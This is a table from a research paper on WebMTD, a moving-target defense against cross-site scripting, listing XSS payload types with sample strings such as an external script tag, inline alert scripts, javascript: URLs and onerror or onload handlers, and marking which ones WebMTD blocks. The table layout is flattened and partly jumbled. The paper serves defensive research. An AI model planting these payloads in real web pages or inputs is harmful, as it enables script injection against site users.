Research Article
WebMTD: Defeating Cross-Site Scripting Attacks Using Moving Target Defense
Table 2
Types of XSS exploit codes and examples.
| | Type | Sub-type | Example codes | Defense |
| | Script block | External | <script src=http://.../XSS.js></script> | Viable on all browsers | | | | Blocked by WebMTD | | Inline | <script>alert(’XSS’)</script> | Viable on all browsers | | | | Blocked by WebMTD |
| | Inline script code | Elements w/ | <img src=javascript:alert(XSS);> | Now, only viable for iframe. | | javascript: URL | <img src=javascript:alert(String.fromCharCode(88,83,83))> | Blocked by WebMTD | | as source | <div style=background-image: url(javascript:alert(XSS))> | | | | <bgsound src=javascript:alert(XSS);>
<link rel=stylesheet href=javascript:alert(XSS);>
...
<IFRAME SRC=javascript:alert(XSS);></IFRAME> | | | Elements | <img src=# onmouseover=alert(XSS)> | Viable on all browsers | | w/ event attributes | <img src= onmouseover=alert(XSS)> | Blocked by WebMTD | | | <img onmouseover=alert(XSS)>
<img src=/ onerror=alert(String.fromCharCode(88,83,83))></img>
<body onload=alert(XSS)>
<img src=/ onrror=alert(XSSd)> | |
|
|
